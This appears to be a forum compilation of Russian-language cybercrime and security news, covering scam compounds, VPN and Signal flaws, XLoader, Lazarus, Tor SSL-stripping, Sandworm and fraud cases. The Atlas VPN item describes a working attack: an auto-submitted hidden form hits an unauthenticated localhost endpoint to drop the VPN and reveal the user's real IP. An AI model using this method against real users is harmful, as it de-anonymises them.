В числе используемых инструментов называется [«Прозрачный блокчейн»](https://forklog.com/news/smi-v-rossii-razrabotali-sistemu- otslezhivaniya-kriptovalyutyh-tranzaktsij) от Росфинмониторинга.
Тестирование продолжится до конца мая, но может быть продлено на неопределенный срок в зависимости от результатов.
«По итогам пилота должно быть сформировано базовое понимание необходимых действий и инструментов для кредитных организаций в части проведения криптокомплаенса, процедуры “Знай своего криптоклиента” и “Знай свою криптотранзакцию”», — отметил Бушмелев.
Click to expand...
Правоохранительные органы Мьянмы передали китайским коллегам 10 участников организованных кибермошеннических группировок. Среди задержанных — главари трех известных преступных кланов.
Такие меры стали ответом на требование Министерства общественной безопасности КНР, которое в декабре опубликовало список разыскиваемых преступников, связанных с правящей в Мьянме военной хунтой.
Напомним, что с лета 2023 года Китай настойчиво требовал от властей соседней страны принять жесткие меры против многочисленных анклавов кибермошенников, действующих в приграничных районах. Поводом стала волна махинаций с использованием схемы «забоя свиней» жертвами которых становились граждане КНР. Преступники вербовали жертв через интернет, втирались к ним в доверие, а затем похищали их средства под предлогом выгодных инвестиций.
Деятельность мошеннических анклавов в приграничных районах Мьянмы опиралась на использование принудительного труда людей, незаконно завезенных туда из соседних стран.
В октябре прошлого года коалиция повстанцев начала военную операцию в районе Коканг на границе с Китаем, поставив целью ликвидацию очагов киберпреступности. Им удалось захватить значительные территории, включая «криминальную столицу» Лауккайн. Однако в начале февраля Китай добился заключения перемирия.
Во вторник Министерство общественной безопасности КНР объявило о задержании Бай Суочэна, бывшего руководителя Коканского региона, его сына и дочери, а также главарей двух других влиятельных группировок Вэй Чаожэня и Лю Чжэньсяна. Кроме того, были арестованы Лю Чжэнмао и Сюй Лаофа, возглавлявшие еще один мошеннический клан, а также четверо их сообщников.
Китайское ведомство назвало передачу разыскиваемых лиц «выдающимся достижением» в отношениях двух стран. По его данным, с начала операции из северных районов Мьянмы было депортировано порядка 44 000 подозреваемых в телекоммуникационном мошенничестве, в том числе 171 человек, обеспечивавших финансирование нелегальных операций.
Однако эксперты предостерегают, что подавление преступной активности в одном регионе может лишь способствовать перемещению её в другие районы. Так, по имеющимся данным, главари синдикатов, почувствовав давление в Кокане, уже перебазировались в южные районы штатов Шан и Карен, в том числе в известный своей криминальной активностью город Шве Кокко. Там они наладили сотрудничество с другой влиятельной военизированной группировкой DKBA (Democratic Karen Buddhist Army), контролирующей соседние территории.
sc: twitter.com/johnwSEAP/status/1752357527004889118
Пользователь Reddit под ником Educational-Map-8145
обнаружил
0-day уязвимость в Linux-клиенте Atlas VPN, которая приводит к утечке реальных
IP-адресов пользователей при простом посещении сайта.
Исследователь рассказывает, что Linux-клиент Atlas VPN (в частности последняя
версия 1.0.3), имеет конечную точку API, которая прослушивает localhost
(127.0.0.1) через порт 8076.
Этот API предлагает интерфейс командной строки (CLI) для выполнения различных действий, например, отключения VPN-сессии по URL-адресу http://127.0.0.1:8076/connection/stop. При этом API не производит никакой аутентификации, что позволяет кому угодно, даже сайту, который посещает жертва, использовать CLI-команды.
Эксплоит Educational-Map-8145 использует API Atlas VPN Linux для раскрытия
реальных IP-адресов пользователей. Так, PoC создает скрытую форму, которая
автоматически отправляется с помощью JavaScript для подключения к URL
эндпоинта API http://127.0.0.1:8076/connection/stop
При обращении к этому эндпоинту API происходит автоматическое завершение всех активных сеансов Atlas VPN, скрывающих IP-адрес пользователя. После разрыва VPN-соединения эксплоит подключается к адресу api.ipify.org, чтобы узнать реальный IP-адрес посетителя.
Специалист по кибербезопасности Amazon Крис Партридж (Chris Partridge) протестировал и эксплоит и полностью подтвердил выводы Educational-Map-8145. Партридж опубликовал ролик с демонстрацией атаки и объясняет, что эксплоит обходит существующую защиту CORS (Cross-Origin Resource Sharing) в браузерах, поскольку запросы к API Atlas VPN отправляются в виде форм.
«CORS не затрагивает отправку форм по причинам legacy/совместимости, и они считаются "простыми запросами", согласно спецификации CORS», — пояснил эксперт изданию Bleeping Computer.
Click to expand...
Обычно CORS блокирует запросы, выполняемые скриптами к доменам, отличным от
домена происхождения. Но в случае этого эксплоита речь идет о запросах к
localhost посетителя по адресу http://127.0.0.1:8076/connection/stop
.
При этом Партридж говорит, что использование формы для обхода CORS не позволяет сайту увидеть какой-либо ответ от нее. Но в данном случае ответ и не нужен, поскольку форма используется лишь для доступа к URL-адресу для отключения VPN-соединения.
«Предполагается, что формы должны быть защищены от CSRF. Но как мы видим, это не совсем верное предположение привело к непредвиденным последствиям», — заключает Партридж.
Click to expand...
Пользователь Reddit, обнаруживший проблему, писал, что пытался связаться с разработчиками Atlas VPN, но его проигнорировали. Так как у компании нет программы bug bounty, публичное раскрытие информации об уязвимости стало единственным выходом.
Теперь, когда информация о баге попала на страницы СМИ, представители Atlas VPN извинились перед исследователем и пообещали выпустить исправление для своего Linux-клиента в ближайшее время. Сообщается, что проблема затрагивает Linux-клиент Atlas VPN версии 1.0.3, и пользователей уведомят о выходе патча.
Так как уязвимость пока не устранена, пользователям Linux-версии Atlas VPN рекомендуется принять меры предосторожности, а лучше временно перейти на альтернативные VPN-решения.
Мошенник из индийского города Лудхиана (штат Пенджаб) попался с 15 чужими дебетовыми карточками, которые он украл у настоящих владельцев. Человек по имени Сумит Кумар (Sumit Kumar) был вынужден каждый день носить новую одежду, чтобы по-разному выглядеть на камерах видеонаблюдения банков; иногда он также повязывал тюрбан, а иногда носил очки и кепку.
Поводом для ареста стало обращение одной из жертв мошенника. Житель местной деревни столкнулся с проблемами при съеме денег в банкомате. В этот момент ему предложил свою помощь уже находившийся в помещении человек, который представился сотрудником банка. В процессе Кумар подменил настоящую карточку поддельной и украл без малого 100 тысяч рупий (около 110 тысяч рублей).
При проверке записей из других помещений с банкоматами полицейские обнаружили, что эту схему обвиняемый практиковал как минимум полтора десятка раз, что позднее было подтверждено при задержании — у него изъяли чужие карточки, от которых он не стал избавляться.
source: msn.com/en-in/news/other/swindler-lands-in-police-net-15-stolen-debit- cards-recovered/ar-AA1dGsp5
Десктопная версия Signal 6.2.0 и более ранние версии для Windows, Linux и macOS подвержены уязвимостям CVE-2023–24068 и CVE-2023–24069.
Signal Desktop хранит вложения в каталоге ~\attachments.noindex в незашифрованном виде. Они автоматически удаляются из этого каталога, если пользователь удаляет их из чата. Однако, если на сообщение с вложением был дан ответ собеседника (с цитированием), то вложение продолжает храниться в локальной папке в открытом виде даже после удаления в интерфейсе мессенджера.
Более того, злоумышленник может подменить хранящийся в кэше файл. Если объект потенциального взлома после подмены перешлёт существующую ветку в другие чаты, то в ней окажутся именно подменённые файлы, а не исходные. Исходя из этого, исследователи делают вывод, что Signal Desktop не проверяет изменения в кэшированных ранее файлах.
Исследователи Check Point расчехлили последние образцы новых версий XLoader 2.5 и 2.6, которые оказались заряжены важным функционалом, затрудняющим отслеживание и идентификацию вредоносной ПО.
Предназначенный для кражи информации и задетектированный в январе 2021 года кросс-платформенный ботнет XLoader изначально базировался на Formbook и нацелен на ОС Windows и macOS. Впервые он поступил в широкое распространение в январе 2021 года.
Новая версия использует основы теории вероятности для сокрытия С2, что придают малварю значительную стабильность в работе, а операторы получают возможность использовать инфраструктуру без риска утраты узлов, избегая блокировок раскрытых IP-адресов.
Подобная система маскировки фактических серверов управления и контроля (C2) была заложена в версии 2.3, скрывая реальное доменное имя в конфигурации, включающей 63 ложных значения.
Но в последних версиях аналитики Check Point установили, что вредоносное ПО производит перезапись 8 значений из списка случайно выбранных доменов из списке конфигурации, включающего 64 значения, новыми при каждой иттерации установления связи.
Получается, что если реальный C2-домен находится во второй части списка, то XLoader однократно обращается к нему в каждом цикле в 80-90 секунд. Появляясь в первой части списка, значение будет перезаписано другим случайным доменным именем.
Восемь доменов, которые перезаписывают первую часть списка, отбираются случайным образом, и настоящий домен C2 может быть одним из них, формируя вероятность 7/64 или 1/8 обращения к реальному серверу на следующем цикле в зависимости от расположения подставного домена.
Check Point заметили, что в XLoader 2.6 новая обфускация C2 не поддерживается для 64-битной версии полезной нагрузки, в которой малварь каждый раз связывается с реальным доменом C2, что объясняется высоким распространением 32-разрядных систем в песочницах применяемых для анализа виртуальных машин.
В целом, новая техника помогает надежно спрятать реальные C2 от обнаружения ресерчерами, которым потребуется больше времени для тестов и попыток эмуляций, чтобы гарантированно идентифицировать фактический адрес, что также значительно снижает эффективность всех автоматизированных сценариев.
С другой стороны, вряд ли операторы будут выжидать часами в ожидании связи с C2 после заражения. Но будем посмотреть.
• Source: <https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you- can/>
Северокорейская киберпреступная группировка Lazarus эксплуатирует нашумевшую
уязвимость в утилите журналирования Log4j для внедрения бэкдоров на серверы
VMware Horizon с целью их дальнейшего заражения вредоносным ПО для кражи
данных.
Речь идет об уязвимости удаленного выполнения кода CVE-2021-44228 , также
известной как Log4Shell, которая затрагивает множество продуктов, в том числе
VMware Horizon.
Хакеры начали эксплуатировать уязвимые серверы Horizon в январе 2022 года, и многие остаются уязвимыми и по сей день, несмотря на наличие доступных обновлений безопасности.
Согласно отчету Ahnlab ASEC, группировка Lazarus атакует уязвимые продукты
VMware через Log4Shell с прошлого месяца.
В самом начале атаки злоумышленники эксплуатируют уязвимость в Log4j через
сервис Apache Tomcat в Vmware Horizon, чтобы выполнить команду PowerShell. В
конечном итоге эта команда приводит к установке на сервере бэкдора NukeSped
(NukeSpeed), связываемого экспертами с КНДР.
Последний вариант бэкдора, проанализированный специалистами ASEC, написан на
C++ и использует шифрование RC4 для безопасной связи с C&C-инфраструктурой.
Ранее NukeSped использовал XOR.
В скомпрометированной среде NukeSped выполняет разные задачи по кибершпионажу, в частности, делает скриншоты, записывает нажатия кнопок на клавиатуре, получает доступ к файлам и пр. Более того, он поддерживает команды командной строки. В новом варианте бэкдора также присутствуют два новых модуля – для похищения USB-контента и доступа к web-камерам.
Lazarus использует NukeSped для установки дополнительного консольного инфостилера, похищающего следующие данные:
Учетные данные и историю браузинга из Google Chrome, Mozilla Firefox, Internet Explorer, Opera и Naver Whale;
Данные электронной почты из Outlook Express, MS Office Outlook и Windows Live Mail;
Имена недавно использовавшихся файлов в MS Office (PowerPoint, Excel и Word) и Hancom 2010.
В некоторых случаях вместо NukeSped через уязвимость Log4Shell группировка Lazarus развертывает майнер криптовалюты Jin Miner.
По данным Центробанка, в третьем квартале 2021 года мошенники похитили более 3,2 млрд рулей с банковских счетов россиян. За год эта цифра увеличилась почти на 0,5 млрд рублей. При этом доля средств, которые в итоге удалось вернуть, упала почти вдвое, с 13,1% до 7,7%.
В 2022 году начеку стоить быть прежде всего пользователям онлайн-банкинга, предупредили в Positive Technologies на пресс-мероприятии, посвященном итогам 2021 года в области кибербезопасности. Ведь именно на последних и сосредоточат свое внимание атакующие.
«Одной из главных целей злоумышленников в 2022 году станут клиенты банков, активно использующие онлайн-банкинг», — прогнозируют в Positive Technologies.
Click to expand...
В частности, киберпреступники будут активно развивать инструменты для компрометации банковских приложений — в числе последних компании называют банковские трояны, а также стилеры.
За счет вредоносного программного обеспечения злоумышленники могут получать доступ к учетным данным, а также устройствам пользователей, и даже обходить аутентификацию. Конечно же, хакеры продолжат применять в рамках атак методы социальной инженерии.
Напомним, что в России уверенно растет доля клиентов, которые используют онлайн-банкинг. По оценкам Центробанка, среди взрослого населения ими пользуется 75% людей, в будущем показатель станет только расти.
Раскрыты махинации в отношении World of Tanks
Как стало известно “Ъ”, в России создан прецедент привлечения к уголовной ответственности за несанкционированное вмешательство с помощью вредоносных программ в игровую компьютерную индустрию. Под удар предполагаемого злоумышленника попали такие популярные онлайн-игры, как World of Tanks и World of Warships. За несколько лет на своем сайте уроженец Екатеринбурга Андрей Кирсанов, по данным полиции, успел продать тысячи пакетов с ботами и чит- программами, позволявшими пользователям получать нечестные преимущества перед другими игроками. Нанесенный создателям игр ущерб оценивается в 670 млн руб.
Черемушкинский райсуд Москвы приступил к рассмотрению уголовного дела в отношении екатеринбуржца Андрея Кирсанова, обвиняемого в создании, использовании и распространении вредоносных компьютерных программ (ч. 2 ст. 273 УК РФ). Это дело для России прецедентное.
Во всяком случае, до этого к уголовной ответственности именно за несанкционированное вмешательство в игровую компьютерную индустрию никого не привлекали.
В основном по этой статье Уголовного кодекса фигурантам приходилось отвечать за попытки взломать с помощью вредоносных программ логины и пароли пользователей для входа на различные интернет-ресурсы. В делах такого рода реальной уголовной ответственности подсудимым удавалось избегать — рассмотрения в судах завершались, как правило, условным наказанием или назначением штрафа.
Отметим, что первоначально дело в отношении подсудимого Кирсанова должно было слушаться в особом порядке, поскольку во время следствия об этом ходатайствовал сам фигурант, полностью признавший вину и раскаявшийся в содеянном. Однако на первом же судебном заседании Андрей Кирсанов, по данным “Ъ”, неожиданно заявил, что отказывается от своих признательных показаний и вину в инкриминированном деянии не признает. В итоге 27 декабря суд начнет разбирать это дело в общем порядке, с исследованием всех доказательств, а также допросами свидетелей и потерпевших. Сам господин Кирсанов находится под подпиской о невыезде.
Уголовное дело, фигурантом которого он оказался, было возбуждено УВД по Юго- Западному административному округу Москвы весной 2021 года по материалам управления «К» Бюро специальных технических мероприятий (БСТМ) МВД России. Потерпевшей стороной по делу признана белорусская компания Wargaming, являющаяся издателем и разработчиком компьютерных игр, включая популярные танковый и морской онлайн-экшен World of Tanks и World of Warships.
В них игроки берут под свое управление боевую технику — танки и корабли — и участвуют в онлайн-сражениях. За победы в таких битвах они получают внутриигровую валюту и очки опыта, которые позволяют развиваться и открывать новую, более мощную технику. По словам представителей компании, с момента выхода игр для них было создано большое количество вредоносных программ, которые позволяют пользователям получать нечестные преимущества перед другими игроками,— это так называемые боты и читы. Как утверждают в Wargaming, часть пользователей теряют интерес к игре в том числе из-за того, что соперники пользуются такими вредоносными программами. По словам представителей компании, только в прошлом году в World of Tanks было исключено из игры более 10 тыс. ботов.
Как установили сотрудники БСТМ МВД России, с 2015 года торговля ботами и чит- программами для игры в World of Tanks и World of Warships велась через сайты Cyber Tank и Cyber Ship.
После несанкционированного вмешательства в программу в бою с онлайн-оппонентом игрок мог пользоваться автоприцелом или вовсе поставить игру в авторежим. В первом случае программа сама находила наиболее уязвимые места противника. Из- за этого игроки, использовавшие бота, получали нечестное преимущество: им не составляло никакого труда попасть в соперника, который играл честно и полагался только на свое мастерство. В режиме автоигры бот полностью брал на себя управление техникой игрока и позволял «зарабатывать» опыт и внутриигровую валюту в автоматическом режиме. В зависимости от количества боев цена пакета на сайте Андрея Кирсанова варьировалась от 25 руб. (150 боев) до 2125 руб. (15 тыс. боев).
В итоге сотрудники МВД провели через интернет проверочную закупку программ Cyber Tank и Cyber Ship. Согласно полученному заключению специалистов, обе являлись вредоносными, поскольку «приводили к модификации компьютерной информации».
Андрей Кирсанов был вызван на допрос сначала в качестве свидетеля, но вскоре поменял статус на обвиняемого.
Юридический представитель компании Wargaming Никита Кузнецов заявил “Ъ”, что потерпевшей стороной подготовлена экспертиза, установившая ущерб в размере 670 млн руб.
«В суде мы будем ходатайствовать о приобщении ее результатов к материалам дела. Создание и продажа программ, нарушающих правила игр и их внутреннюю экономику,— это такое же преступление, как кража или мошенничество, и противодействовать ему нужно в правовом поле»,— добавил господин Кузнецов.
Получить комментарии защиты Андрея Кирсанова “Ъ” не удалось.
В феврале 2021 года атаки задействовали 27% вредоносных выходных узлов Tor.
Уже более года неизвестные злоумышленники добавляют вредоносные выходные узлы в сеть Tor с целью перехвата трафика и осуществления SSL-stripping атак на пользователей, посещающих связанные с криптовалютой сайты.
SSL-stripping - понижение соединения с защищенного HTTPS до простого HTTP.
Об атаках стало известно еще в августе 2020 года благодаря исследователю безопасности под псевдонимом Nusenu, который в том числе является оператором выходного узла Tor. Тогда сообщалось, что атаки начались в январе прошлого года, и в разгар операции злоумышленники контролировали примерно четыре сотни вредоносных выходных узлов Tor. По словам специалистов, в ходе атак злоумышленники подменяли адреса криптовалютных кошельков собственными для перехвата транзакций.
Несмотря на огласку в прошлом году, атаки по-прежнему продолжаются - в феврале 2021 года атаки задействовали 27% вредоносных выходных узлов Tor. Хотя вторую волну атак заметили и обезвредили, к тому времени вредоносная инфраструктура была активна уже на протяжении нескольких недель.
Основная причина успешности данной операции заключается в том, что атакующие добавляли вредоносные ноды небольшими количествами, незаметно создавая внушительную инфраструктуру. Однако в начале мая злоумышленники попытались одновременно вернуть online все отключенные серверы, что не могло остаться незамеченным. Атака была обнаружена всего через день после того, как число выходных узлов Tor резко возросло с 1,5 тыс. до более чем 2,5 тыс.
Несмотря на отключение свыше 1000 вредоносных серверов, под контролем атакующих все еще остается 4-6% выходной мощности Tor, отметил Nusenu. Более того, по его словам, после проведения SSL-stripping атаки злоумышленники загружают модификации, однако что именно они делают, пока неясно.
Французское Национальное агентство безопасности информационных систем (ANSSI) заявило, что группа российских «правительственных» хакеров Sandworm (она же Telebots, BlackEnergy, Voodoo Bear) стоит за длившейся три года операцией, в результате которой был взломан ряд французских организаций, использующих мониторинговое ПО Centreon.
Отчет агентства гласит, что в основном атака затронула различных ИТ- провайдеров (в особенности хостеров). При этом первая жертва была скомпрометирована еще в конце 2017 года.
Как уже было сказано выше, произошедшие взломы связывают с мониторинговой платформой Centreon, разработанной одноименной французской компанией. В сущности, этот продукт почти аналогичен по функциональности платформе Orion компании SolarWinds, о компрометации которой стало известно в декабре прошлого года. Среди клиентов Centreon числится немало известных организаций, включая Airbus, Air France KLM, Agence France-Presse (AFP), Euronews, Orange, Arcelor Mittal, Sephora и даже Министерство юстиции Франции.
Эксперты ANSSI пишут, что злоумышленники атаковали доступные через интернет системы Centreon, однако остается неясным, использовали хакеры какие-то уязвимость в Centreon или брутфорсили пароли для учетных записей администраторов. Известно лишь, что многие пострадавшие использовали последние версии Centreon, и случившееся не было атакой на цепочку поставок, как в случае с SolarWinds.
Если атака оказывалась успешной, злоумышленники заражали систему веб-шеллом PAS и бэкдор-трояном Exaramel, что позволяло им полностью контролировать скомпрометированную систему и прилегающую к ней сеть.

Теперь ANSSI призывает все французские и международные организации проверить свои установки Centreon и системы на предмет компрометации и присутствие вредоносов PAS и Exaramel.
Code:Copy to clipboard
Sandworm
В конце 2020 года Министерство юстиции США предъявило обвинения шести российским гражданам, которые якобы входят в группировку Sandworm.
Американские власти утверждают, что все обвиняемые служат в подразделении 74455 Главного разведывательного управления России (Unit 74455) и по приказу правительства России проводили кибератаки с целью дестабилизировать другие страны, вмешаться в их внутреннюю политику, причинить ущерб и денежные потери.
Минюст США связывает группировку Sandworm с атаками на критическую инфраструктуру Украины, выборы во Франции, Олимпийские игры в Пхенчхане, разработкой шифровальщика NotPetya и другими инцидентами.
Источник: xakep.ru/2021/02/16/centreon-sandworm/
Компания «Яндекс» сообщает, что во время регулярной проверки ее служба безопасности выявила факт внутренней утечки данных.
Расследование показало, что один из сотрудников компании предоставлял несанкционированный доступ к почтовым ящикам пользователей. Это был один из трех системных администраторов, «обладавших такими правами доступа, необходимыми для выполнения рабочих задач по обеспечению технической поддержки сервиса». В результате его действий оказались скомпрометированы 4887 почтовых ящиков.
Сообщается, что в настоящее время неавторизованный доступ в скомпрометированные ящики уже заблокирован, а все пострадавшие получили уведомления о необходимости смены пароля. Также компания уже обратилась в правоохранительные органы.
«По выявленному инциденту проводится внутреннее расследование и будут пересмотрены процессы работы сотрудников, обладающих административными правами такого уровня доступа. Это поможет минимизировать влияние человеческого фактора на безопасность данных пользователей.
Мы очень сожалеем о случившемся и приносим извинения пользователям, которые пострадали из-за этого инцидента», — пишут представители «Яндекса».Click to expand...
Источник: xakep.ru/2021/02/12/ya-leak/
Арест подозреваемого раскрыл дополнительные подробности о его деятельности.
В Буэнос-Айресе, Аргентина, полиция обнаружила нелегальную финансовую организацию, занимающуюся обменом фиатных- и криптовалют, которая могла быть связана с северокорейскими хакерами. Организацию возглавлял 29-летний гражданин, который, как предполагается, мог получить часть криптоактивов на сумму $100 миллионов, похищенных у Horizon Bridge в 2022 году.
В ходе обысков в квартире у обвиняемого были изъяты криптовалюта на $121 327 и электронные устройства, которые могут содержать данные о транзакциях, связанных с отмыванием денег. Преступник постоянно менял место жительства, чтобы скрыться от следствия, но его удалось найти благодаря информации от компании Binance, где он вел часть операций. В другой локации, связанной с подозреваемым, было найдено ещё $15 миллионов.
Расследование началось в ноябре 2023 года, когда стало известно, что часть украденных хакерами средств могла оказаться на криптокошельке в Аргентине. В ходе расследования выяснилось, что арестованный провёл более 2400 переводов криптовалют через Binance Pay на общую сумму свыше 4,5 миллионов USDT.
Правоохранительные органы объясняют, что подозреваемый приобрел более 1,3 миллиона USDT за фиатные деньги и провел 102 транзакции по продаже более 29 000 USDT, получив за них наличные деньги. USDT — это стейблкоин, привязанный к курсу доллара США.
Также появились подозрения, что преступник мог использовать других людей в качестве «мулов» для сокрытия следов денежных переводов, что усложняет расследование. Также следователи предполагают, что гражданин мог быть вовлечён в более широкую преступную деятельность, связанную с финансированием терроризма и распространением CSAM-материалов. Дело продолжается, и следователи надеются выявить больше информации о возможной сети, связанной с отмыванием денег и другими преступлениями.
lanacion.com.ar/seguridad/investigacion-del-fbi-la-ruta-de-una-ciberestafa-de- norcoreanos-que-termino-en-el-departamento-de-un-nid21082024/
"Денежные мулам", которые переводят деньги мошенникам или снимают для них наличку через банкоматы, придется компенсировать в бюджет ВСЮ сумму "отмытых" денег. А не только ту небольшую часть, которую составляет их личное вознаграждение.
Как пояснила пресс-секретарь Латвийской прокуратуры Айга Эйдука, в ходе разбирательства конкретного дела "денежных мулов" Верховный суд (Сенат) это подтвердил.
Напомним в этой связи: "денежный мул" — это человек, который за вознаграждение использует свой персональный счет для перевода денег мошенников. То есть: "мулы" помогают, к примеру, телефонным мошенникам снимать деньги со счетов, их переводить, превращать в наличку. Эту работу обычно предлагают молодым людям, студентам: за "почти ничего не надо делать" можно получить большие для них деньги. Проблема в том, что многие из них зачастую не отдают себе отчет в том, что совершают уголовное преступление.
Однако, как мы увидим из конкретного дела, это может очень дорого обойтись.
Защита: они сами получили немного!
13 марта 2024 года Сенат отказал в возбуждении кассационного производства в связи с жалобой защиты обвиняемого на приговор Рижского окружного суда от 21 ноября 2023 года в части применения статьи 70.14 Уголовного закона по делу об отмывах.
Сенат оставил без изменения решение Рижского окружного суда о взыскании ВСЕЙ легализованной суммы - независимо от того, сколько зарабатывают сами обвиняемые "мулы".
Как установило следствие, обвиняемые получили деньги, полученные преступным путем другим лицом. Часть из этих средств "мулы" оставили себе в качестве вознаграждения, а часть передали далее другому подследственному. То есть, совершили "отмыв".
При этом суд первой инстанции признал: раз сами обвиняемые получили только часть, об этой части и пойдет речь при взыскании.
Однако прокурор опротестовал приговор и Рижский окружной суд отменил приговор суда первой инстанции о НЕвзыскании в пользу государства с подсудимых всех денег, полученных преступным путем.
Сенат в своем постановлении указал: Рижский окружной суд решил правильно.
Решение Сената обжалованию не подлежит.
Как "мулам" пришлось возвращать более 45 000
Отметим также: суммы по делам об "отмывах" иногда проходят крупные.
В марте прошлого года стало известно: Суд по экономическим делам, рассматривая дело об отмывании денег, которое было совершено с использованием сети так называемых "денежных мулов", решил утвердить результаты сделки о признании вины и наказании, заключенной между прокурором и 12 подсудимыми.
При этом до заключения соглашения с подследственных взыскали почти 45 000 евро, а также была достигнута договоренность о добровольном возврате в госказну оставшейся части преступно нажитых средств.
Подсудимые были приговорены к тюремным срокам от трех до пяти лет в зависимости от роли каждого подсудимого в организованной группе. Для 11 членов группы сроки вынесены условно и с испытательным сроком.
Всего по делу проходили 14 обвиняемых, один из которых оказался гражданином Германии, а все его подельники — граждане Латвии. Следует отметить, что всего в группу "мулов" входили более 90 человек. (Масштабное расследование по данному уголовному процессу было проведено совместно с Евроюстом).
Члены группы легализовывали в Латвии средства, преступно добытые за границей в ходе мошенничеств и других преступлений.
• Source: prokuratura.lv/lv/aktualitates/2024/aktualitates/senats-atstaj- negrozitu-rigas-apgabaltiesas-spriedumu-par-visas-legalizetas-noziedzigi- iegutas-finansu-lidzeklu-summas-piedzinu-ta-devetaja-naudas-mulu-lieta-3142
«Из Индонезии в Россию в сопровождении сотрудников НЦБ Интерпола МВД России депортирован Павел Миронов. Он обвиняется в создании преступного сообщества и крупном мошенничестве», - сообщила официальный представитель МВД России Ирина Волк.
Как сообщалось ранее (mvdmedia.ru/news/ofitsialnyy-predstavitel/irina-volk-v- tatarstane-vozbuzhdeno-ugolovnoe-delo-v-otnoshenii-prestupnogo-soobshchestva- zanimavshe/), криминальная организация действовала на территории Татарстана в период с февраля 2017 по октябрь 2021 года. Для того чтобы придать своим действиям законный вид, сообщники зарегистрировали три фирмы. Они предоставляли услуги по обучению финансовой грамотности и организации торгов с финансовыми инструментами на электронном рынке «Форекс» и криптобиржах. Офисы располагались в престижных торговых и бизнес-центрах в исторической части Казани.
«Незаконно завладев базой данных телефонных номеров жителей республики, фигуранты стали звонить абонентам и сообщать о якобы выигранных ими сертификатах на обучение стоимостью 300 долларов США. Во время первого визита в офис потенциального клиента злоумышленники определяли его состоятельность, получали информацию об отсутствии банковских задолженностей и крупных финансовых обременений. Далее предлагалось обучение игре на бирже с предоставлением программного обеспечения и котировок акций, золота, валют. После того как гражданин втягивался в процесс, участники криминальной организации уговаривали его вложить денежные средства эквивалентом не менее пяти тысяч долларов США и начать зарабатывать на фондовом рынке. Тем, у кого не имелось такой суммы, они содействовали в получении кредита», - напомнила Ирина Волк.
В действительности программное обеспечение не имело выхода на биржевой рынок. К программе, которая лишь имитировала действия игроков, был привязан криптокошелек, управляемый обвиняемыми. Поступившие на него денежные средства граждан переводились на счета злоумышленников. Общая сумма ущерба превысила 120 миллионов рублей.
«В связи с тем, что Павел Миронов покинул Россию, на основании запроса МВД по Республике Татарстан он был объявлен в розыск по каналам Интерпола. Ему заочно предъявлено обвинение в совершении преступлений, предусмотренных статьями 159 и 210 УК РФ.
В августе текущего года обвиняемый задержан в Индонезии и сегодня депортирован в Россию», - уточнила Ирина Волк.
• Video:
LockBit под подозрением: что знают хакеры о британской обороне?
Секретная информация о ключевых военных и разведывательных объектах Великобритании была опубликована в открытом доступе. Как [утверждает](https://www.mirror.co.uk/news/uk-news/russia-linked-hackers-hit- uk-30850139) издание The Daily Mirror, за инцидентом стоят русскоязычные хакеры, связанные с группой LockBit. Однако конкретных доказательств причастности России к атаке пока не предоставлено. Утечка данных произошла в прошлом месяце после масштабного налета на компанию Zaun, специализирующуюся на производстве ограждений для объектов с повышенными требованиями к безопасности.
Тысячи страниц конфиденциальной информации оказались в теневом сегменте Интернета. Среди утекших данных — сведения, которые могут облегчить незаконный доступ к базе подводных лодок HMNB Clyde, химическому лабораторному комплексу Porton Down и радиоэлектронному центру GCHQ. Также были скомпрометированы данные о тюрьмах строго режима и военных объектах, ключевых для кибербезопасности страны.
Кеван Джонс, член Комитета по обороне от Лейбористской партии, сделал заявление: «Это потенциально очень опасно для безопасности наших наиболее чувствительных объектов». Тобайас Эллвуд, председатель того же комитета, подчеркнул, что этот инцидент заставляет пересмотреть текущие меры безопасности в цифровой сфере.
Группа LockBit уже давно привлекает внимание ФБР и других международных органов. Она обвиняется в ряде кибератак по всему миру и вымогательстве огромных сумм. За последние годы хакеры потребовали в общей сложности около 80 миллионов фунтов стерлингов в качестве выкупа.
Представители компании Zaun подтвердили информацию о возможной утечке. По их словам, хакеры могли получить доступ к электронным письмам, заказам, чертежам и проектным файлам. Однако, компания утверждает, что классифицированная информация, связанная с национальной безопасностью, не хранилась на системах, подвергшихся атаке. Ведется расследование для определения полного объема утекших данных и их возможного влияния на безопасность страны.
Компания Zaun - это британская компания, которая производит ограждения и
системы охраны периметра для объектов повышенного риска. Она была основана в
1996 году и имеет штаб-квартиру в Вулвергемптоне. Компания специализируется на
разработке и производстве высокотехнологичных решений для защиты критических
инфраструктур, таких как военные базы, атомные станции, аэропорты, тюрьмы и
спортивные сооружения. Организация также поставляла защитные барьеры на
Олимпийских играх в Лондоне в 2012 году.
Подробнее:
https://www.securitylab.ru/news/541458.php
Cybel security research lab discovered chameleon banker targeting banks, govt and crypto apps. It's functionality includes overlay injects, otp and 2fa stealing browser cookies .
Как написал и спел российский бард, «в суете городов и потоке машин» из Нью- Джерси пришло сообщение, что присяжные большого жюри федерального суда в Трентоне согласились с прокуратурой, обвинявшей 41-летнего бруклинца Александра Заретцера в преступном сговоре с целью обмана налоговой службы IRS.
Из обвинения, которое уместилось на семи страницах, следует, что Заретцеру принадлежала зарегистрированная в штате Нью-Йорк корпорация Prime Aid & PHA, куда входили аптеки в нью-джерсийском Юнион-Сити (Prime Aid Union City) и нью- йоркском Бронксе (Prime Aid Bronx).
Заретцер не имел никакого отношения к этим аптекам, одна из которых (в Бронксе) по документам принадлежала его другу и деловому партнёру, который проходит в деле как сообщник Individual-1, проживающий в Нью-Джерси и работавший в аптеке Prime Aid Union Cit. Компания Заретцера Prime Aid & PHA по сути была «пустышкой», через которую он обналичивал выписанные на эти аптеки чеки, скрывая их от налогов.
По делу также проходит Company-1 - холдинг, связанный с несколькими банковскими счетами, которые Individual-1 выдавал за свои личные. В деле пока значатся свидетелями Individual-2 и Individual-3, оба из Нью-Йорка и оба вели дела с Заретцером, причем Individual-2 работал в бруклинском офисе обналичивания чеков. Как сформулировала это федеральная прокуратура Нью- Джерси, Александр Заретцер и другие «сознательно и намеренно вступили в преступный сговор с целью обмана Соединенных Штатов, препятствуя, мешая и затрудняя исполнение государственный функций Налоговой службы (IRS) по установлению, подсчету, оценке и сбору подоходных налогов». Сермяжная правда это мудреной формулировки заключалась в том, что подсудимый «и другие» скрывали от IRS чеки возврата двум упомянутым аптекам денег по подоходным налогам.
